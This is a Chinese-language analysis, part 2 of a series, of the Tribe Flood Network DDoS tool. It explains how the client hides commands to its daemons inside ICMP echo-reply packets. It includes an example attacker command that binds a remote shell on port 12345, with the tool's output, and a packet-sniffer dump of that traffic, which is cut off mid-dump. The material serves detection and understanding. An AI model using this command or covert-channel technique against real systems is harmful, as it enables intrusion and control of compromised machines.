DDoS攻击工具——Tribe Flood Network 分析(2)

　　TFN客户端通过ICMP_ECHOREPLY包而不是ICMP_ECHO包向TFN守护程序发送命令。这能够防止守护程序所在系统的内核发送ICMP_ECHOREPLY包。而TFN守护程序则在需要时也通过ICMP_ECHOREPLY包响应TFN客户端。TFN使用的ICMP包与正常ICMP包的不同之处在于它发送的命令参数及响应。

　　在TFN使用的ICMP_ECHOREPLY包的id域中包含了"命令"（16位二进制值），而在数据段中则是ASCII明文方式的任何参数。

　　以下是某个攻击者执行命令以启动在端口12345上监听的shell：

　　----------------------------------------------------------------------------

　　# ./tfn iplist 4 12345

　　[tribe flood network] (c) 1999 by Mixter

　　[request: bind shell to port 12345]

　　192.168.0.1: shell bound to port 12345

　　#

　　----------------------------------------------------------------------------

　　以下是使用"sniffit"监听到的网络通讯：

　　---------------------------------------------------------------------------- 192.168.0.1

　　ICMP type: Echo reply

　　.. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .

　　.. . .. . .. . .. . 00 . 00 . 64 d D1 . 01 . C8 . 00 . 00 . 31 1 32 2 33 3 34 4

　　35 5 00 .

　　10.0.0.1

　　ICMP type: Echo reply

　　.. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. . .. .

　　.. . .. . .. . .. . 00 . 00 . 6C l AE . 00 . 7B { 00 . 00 . 73 s 68 h 65 e 6C l

　　6C l 20 62 b 6F o 75 u 6E n 64 d 20 74 t 6F o 20 70 p 6F o 72 r 74 t 20